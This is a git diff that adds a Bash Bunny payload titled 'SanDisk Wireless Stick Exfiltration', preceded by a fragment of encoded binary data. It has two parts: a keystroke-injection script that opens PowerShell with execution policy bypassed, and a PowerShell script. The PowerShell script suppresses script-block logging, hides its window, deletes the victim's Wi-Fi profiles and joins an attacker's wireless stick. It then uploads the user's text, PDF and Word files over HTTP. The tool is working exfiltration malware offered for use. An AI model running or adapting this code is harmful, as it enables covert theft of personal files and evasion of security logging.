z*)d(d8D?mB*oy+D2L7RhfDEB5BYd5RlC4c{l{^$)0eA4h=GWBHhJbC+kEIP}_blb1 zUBUM7KM{4rn){W*D4O7Fm>Bw&wnI%VdW*vwE({xdrxan1FzaOT`@^iw@F%9vjyEOL zL3&_cOxkIBlAY^5FBGyDN?6z0b+9;?4zi4_I5~TObbXVfg4c>L_=sdcW#dYMOQEX( zOT2tBWybUfnFP6-irHCJ3^Nb-9kVn<2E=pfYl7w{+kSc|Xvi2D`~w*XhljW>Gh`eH z6b9w#HZ6i{Bpw|H>CXC%;LnM@h|M-rYeAA^; zag~wJ%WEJ^tsft-6VI^H(2xPWfH{eE*39*F(%pl~FqJ9fMm87LWyd*(F=#T7$q)k^ znMb7I{h)zWNrslp|Af2V@*XSAf6njpf1n3)mjC;oRs9YLfq9A4VhY`J%zwPgLilJx zf@@en^N(*Z-23lb&AlikXp3662vP*>yA^A^)(B@SxBmg}&<^;dA#-PCp68Kp<9{KT+Fnmc4 z>3m<1p=&yoB~qa917l+cI7$M;lknSD1Yr*EOFI_O2r`ff zSmgiOGXQdeC!r^YCV8IuV8h`DhSR4j%UmYs5m9xpXiAtAo~THrL&S^C z3iSM}X?yX#>@P4QAZSd;p#vkFq-t2$Z|$|8JN&Xjx+J!Ny&SRnds@ZEhtSQ< zER5>b{RdZ`Jjym*#__oJUfFq7Qxm@aR*rO9>w`(}AWvxMkhWO>mC<{8Rn-HIFq-ke zz*B$zFnwRz`o2VgjM_YWm_j@A?oK{D6~S*(b3YVx%z(pklB?1QFJBVIUB}P7#Y+)) z{es{-5$xl93yem}x(R=k&ldCj`^75e+4z8&FJ8PD)+|cEnenv)trJ~Ib!%p}E+jTK z`B&|ZbzYu8l2h+j!>Fw#^9go=KTq4e69rbL#s&sL3i)Y@f08XMxg$*?GU`P*bkgam zR<;5?ep^B4Xf*x#?KLg6Z)OD!kB$;jwnesAjtpy#(w&cEzI;(i(>w`n77eRcAX;2} zYT>fRJgwzL+m?Rcm0@+dy<7cO78#7r7Yy2cOIw$67}+kN{q2SQ{S@xgYGo8{ShFb# zW0(ylQ%479qrlnl@$oTrl49->@%23A=fA3|txd&-o>~1to&{TZ8n)6Uf;-`n2$qX% zT5EV#9G zSQQo07H=AAKB{Rgl{}^Yn-{er6M56Mjf^JODP$8ZVL2k{=~s>}y%{+NtGjCu81eDZ zh~>vPzYw|h-O8P8g|RbIYLR{!~YWWoQ2GNzUE?j3iy`Ml?c&`{%ay6ZV~G|_ZXeq(&a<{hd;Kw#@-_s%cvHY= zlPb(5r=o&_Kbe$4cpD<B(5}_FX^QWZYd)9)I5=%_S1xDxR4~o5=f8&_LT$&y(sX02bUcJ@~vtZs` zQ+1DSQ|lM2r?NWNnpVX&C_G(%Ya9nFEs?@D#BXkr7vI~!Y;Hk?p<P1$N2nPd$4eTWag215JpgXe5_jEy7U*5Nw$e&fNq zHn)#I|KXLAqJ&36;d4*0SUhp@Lve?>I`qa($mfNX&vCowBpo|hB{$44($K%|!Ar06 z^BJHj+~(rqvT|7)4r}%8N*Q{VCQYQjbb513X03(hIe{3O?ctqXB#7 zBA@6}My*gw1>8m@r>N^0Svlcq|1*LATOn5;4P_d|wXKiM7}W|HO&OUYiJfVNoY;ys zX>ythOQoT#zL3QX+RA;Xm`K9>r zW>V`8tqmF)B7$QyPT%T+T4W_YvT_MbN+#3SddG!&K-K)@IA000s~Gn@-ec?Nmujl5 zNKsK3Ks|o4R4fj@Fg+0cMp|)y)Z^6L%y6AeKiatgY8wjO1`n_s(G1t-^UmA+4W;x2jnZqbZ{X+Dd4B3l7ekxpLemA zd5F4>c1Sj-x`P24CZ05Ph#T!;u5)1PM@DJNgE1gD`auIz5=k58Dej(8&P|-T-HFSd z-9SJhA|9+WH(yPoZH84V0&zf3#+uxOo8T;EHRp=ifa|p_>83uMr>qovz>M$QCAs_3 zzAEz4fhrW2$Mbu2FZcYrom6gc-=~j0&{(j1>aF7%ji(p%^z;Z04#%!cUE36X;-?3| zE!?Q6nhk_AeN=58?OBuVlh#%sE<7iX*oB6MnrscTAsgwy$=0ejH7!j&aW~|Ntn)pS z6^}F=Rw#>m)S*HbhEjYWWdK5hCOfd?ksc2;7sTaq*MU(%x7`k(%u9>1(+^ClE(7#p z0*>&M{*p%0zhCMC@-NE#r&#Za{c@LWWFzn=HUdFJ>;TP3-*pkt6BCrg?tM9?V$b}W z9Jl8H{$kITJ2^Q>d$m`2q76beX&%gEklnL>A0lDXo(ANlq?}yePSFolA*0;TC@J(3;t6DXKLwTw~*J5w{7({VdRVu@NS_&4%O;|O?;pD+B zLQi7U%{N+Ji1w6xXm%;Tt84+^-&^rT#%j+7Qvo2Et>J`#i*P`jre8W2J!`U15s?Hvz?-1 zjIH&q7W!CF;t{k&4TY97g767c^VN%UDlCk92u{KHstMT0o#NsaGX#)<#~brIF1Kh& zFYuil`TFdFFUcyHSP9t}a3p+)DcI9>%K*h-msW{b+V8l>g5=Etq8Z3x^=1V21O&uR zZf;w+!M?*C)a2xcFU$}~-WVE7h`p20+RFfL9c-H<2aDa{+pdpIf9`xW{<+csTMxdR z36O#Q&2VS68k~0mioD=~!U@`e3Lrz5^!N20QOR!aIt-)y=9`&1DQ=o~oPUYAwwDL! zVJe-iSt1oEFklXSRtUx05kzz^j}~z5T*_{**H2l)_e+GVGeut4)21}nj$Dg5cBoJn zLMd!~6ts^O;uTPqj`Q179t}hiD<#Enkc5!UZIJcx6)b~Qqr2$zKgB&w&#-8=3S0kc z;ov+HWzQ(l2G<4$D9cl_iaU3-VXa+d1H*kemgsCSPG*QUp zaf~Y+585H6U9ItbXmMI2u%Mgq@a7LRT4k<}Ll*7{tDS2th>mUZyquNQs%MiR-P=;? z(qvTVIwIP4RUtURO83#kOiL&ikE2JCDcw1^FBj A(f|Me literal 0 HcmV?d00001 diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 new file mode 100644 index 00000000..e08fcf19 --- /dev/null +++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 @@ -0,0 +1,159 @@ +# +# Author: TW-D +# Version: 1.0 +# + +param ( + [string] $SSID, + [string] $PSK, + [string] $LOOT, + [string] $DIRECTORY, + [string] $EXTENSION +) + +# Avoids "PowerShell Script Block Logging". +# +$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static") +$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid()) +$etw_provider.SetValue($null, $event_provider) + +# Hide "PowerShell" window. +# +$Script:showWindowAsync = Add-Type -MemberDefinition @" +[DllImport("user32.dll")] +public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); +"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru +$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null + +If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) { + + # Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection. + # + $interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid + If ($interface_guid) { + $wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\" + $wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse + $wlan_service_items | ForEach-Object { + [xml] $xml_content = Get-Content -Path $_.FullName + $mode = $xml_content.WLANProfile.connectionMode + $name = $xml_content.WLANProfile.name + If ($mode -eq "auto") { + (NETSH WLAN DELETE PROFILE name="$name") | Out-Null + } + } + } + + # Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode. + # + $profile_guid = "{" + [guid]::NewGuid().ToString() + "}" + $profile_path = "${env:TEMP}\${profile_guid}.xml" + $ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) }) +@" + + + ${SSID} + + + ${ssid_hex} + ${SSID} + + + ESS + auto + + + + WPA2PSK + AES + false + + + passPhrase + false + ${PSK} + + + + + false + + +"@ | Out-File -FilePath "${profile_path}" + + (NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null + Remove-Item -Path "${profile_path}" -Force + + # Checks whether the Wi-Fi interface is connected to the "SanDisk". + # Whether the gateway can be reached. + # If not, automatically starts again. + # + While ($TRUE) { + $ConnectionError = $NULL + Try { + (NETSH WLAN CONNECT name="$SSID") | Out-Null + $wifi_connected = (Get-NetConnectionProfile).Name + $gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop) + $gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet) + If ($wifi_connected -eq $SSID -And $gateway_reachable) { + Break + } + } Catch { + $ConnectionError = $_ + Start-Sleep -Seconds 8 + } + } + + # + # Exfiltration of the files via the HTTP channel. + # + + Function Invoke-CustomRequest($Url, $Method) { + $RequestError = $NULL + Try { + $request = [System.Net.WebRequest]::Create($Url) + $request.Method = $Method + $request.GetResponse().Close() + } Catch { + $RequestError = $_ + return $FALSE + } + return $TRUE + } + + Function Invoke-UploadRequest($Url, $File) { + $RestError = $NULL + Try { + $empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File)) + If (!$empty) { + Invoke-RestMethod -Uri $Url -Method PUT -InFile $File + } + } Catch { + $RestError = $_ + } + } + + Function Exfiltration-Files($Directory, $Extension, $Url) { + $files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse + ForEach ($file in $files) { + $random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) ) + $basename = Split-Path -Path "${file}" -Leaf -Resolve + Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null + } + } + + $sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/" + + $check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET" + If ($check_loot) { + Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot + } Else { + Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null + Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot + } + + # Cleanup + # + (NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null + Exit + +} \ No newline at end of file diff --git a/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt new file mode 100644 index 00000000..e643033f --- /dev/null +++ b/payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt @@ -0,0 +1,74 @@ +#!/bin/bash +# +# Title: SanDisk Wireless Stick Exfiltration +# +# Description: Files Exfiltration with "SanDisk Wireless Stick" +# +# Author: TW-D +# Version: 1.0 +# Category: Exfiltration +# Target: Microsoft Windows 10 +# Attackmodes: HID and STORAGE +# +# TESTED ON +# =============== +# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1) +# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +# +# REQUIREMENTS +# =============== +# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050) +# +# STATUS +# =============== +# Magenta solid ................................... SETUP +# Yellow single blink ............................. ATTACK +# Yellow double blink ............................. STAGE2 +# Yellow triple blink ............................. STAGE3 +# Green 1000ms VERYFAST blink followed by SOLID ... FINISH +# + +######## INITIALIZATION ######## + +readonly BB_LABEL="BashBunny" + +readonly SANDISK_SSID="HAK5-EXFIL" +readonly SANDISK_PSK="MyS3cr3TP@sSw0rD" +readonly SANDISK_LOOT="loots" +readonly USER_DIRECTORY="~\\" +readonly FILE_EXTENSION="*.txt,*.pdf,*.docx" + +######## SETUP ######## + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +######## ATTACK ######## + +LED ATTACK + +RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass" +Q DELAY 5000 + +LED STAGE2 + +Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\"" +Q ENTER +Q DELAY 3500 +Q STRING "CD \"\${BB_VOLUME}\"" +Q ENTER +Q DELAY 1500 + +LED STAGE3 + +Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\"" +Q ENTER +Q DELAY 1500 + +######## FINISH ######## + +LED FINISH + +shutdown -h 0 \ No newline at end of file